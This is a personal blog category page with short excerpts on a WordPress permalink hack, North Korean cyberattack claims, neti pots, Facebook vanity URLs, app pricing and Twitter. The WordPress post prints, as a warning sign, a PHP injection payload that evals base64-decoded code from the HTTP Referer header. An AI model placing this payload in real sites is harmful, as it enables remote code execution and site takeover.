Black holes, LHC, Star Wars, quantum uncertainty… if it is of general geek interest, but doesn’t fit into one of the other categories, it lands here.

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition, which I *think* was thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon. In the meantime, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e. not an administrative user) to run some administrator features, e.g. changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…


(more…)


Cyberwar? No, malicious script kiddy

According to the lead Republican on the House Intelligence Committee, Peter Hoekstra, the U.S. should launch an all-out retaliation against North Korea for their role in the recent cyber attacks on American and South Korean internet targets. Unfortunately for the American people, Mr. Hoekstra is either an idiot, willfully ignorant, or intentionally twisting reality for his own political ends. The best experts in the industry agree that the attacks were launched by an attention-seeking amateur.

(more…)


New age health: Neti pot and Salt crystal lamps

I’m not really a gullible person. I tend to prefer claims backed up by multiple reputable research sources. That said, I am willing to try things that are a bit “out there” if the potential negatives are balanced out sufficiently. I mean, even if something doesn’t really work, if it does little or no harm it may help purely via the placebo effect.

This brings me to a couple of things I’ve invested in recently. The first actually has a fair amount of medical research to support it. The second is pretty much debunked. Yet I’ve adopted both into my life, well aware of the limitations of each. I’m referring to the use of neti pots (nasal lavage) to improve sinus health, and to Himalayan salt lamps.

(more…)


Facebook landrush: 3 million names registered in first day

I’m not really a Facebook user. I set up an account sometime in 2007, and then promptly forgot my login ID and password. Nothing about Facebook really appealed to me: I’m not sure why, perhaps at least partly because a lot of what it does I had already more or less been doing for a decade with my own website/blog.

However, I heard a few weeks ago that the Facebook folks were going to start allowing people to set up personal or “vanity” URLs. So instead of “http://www.facebook.com/profile.php?id=39395883”, you could have something like “http://www.facebook.com/cooldude”. I thought I should probably lay claim to some kind of recognizable URL, and so I dug through my old notes and tried to dredge up my old Facebook account information.

(more…)


Why are so many computer users skinflints?

A couple of days ago I responded to a review of a Twitter application I use with the following observations:

[image: 200905311133.jpg]

The review I was referring to was one in PC Magazine about a BlackBerry Twitter application I use and love called Tweet Genius. Twitter’s 140-character constraint makes it a bit tough for me to be completely clear, but my point is this: why is the $10 cost of a highly useful application considered sufficiently noteworthy to be mentioned several times during an otherwise positive review? And why is it that this “it is great, but a major drawback is that it costs something…” kind of notice is so common in software reviews these days?

(more…)


Shifting my Twits around

I’ve moved my Twitter feed from the right side to the left side navigation area on this page. The “balance” was starting to bug me (i.e. too much vertical “stuff” on the right versus the left), and for some reason it just seems to make more sense under “recent comments” than above my photo gallery block.

I have not really slowed down my rate of “tweeting” yet. By the way, I prefer calling individual Twitter posts “twits”, but apparently that is bad form, sorry. I started on May 14th, and I’m posting somewhere around six to eight updates per day. If you look at my follow cost I seem to have stabilized at just below 400 milliscobles. I’m not feeling any compulsion to tweet: I just do so when something catches my eye and I think other folks might want to hear about it. Probably my main “vanity” when tweeting is that I respond to a few people like badastronomer (Phil Plait) and wilh (Wil Wheaton) on occasion. In part I do this because I’m hoping they might say something back, but generally I actually *do* have a question; I just probably would never have the courage to ask them to their face.

(more…)
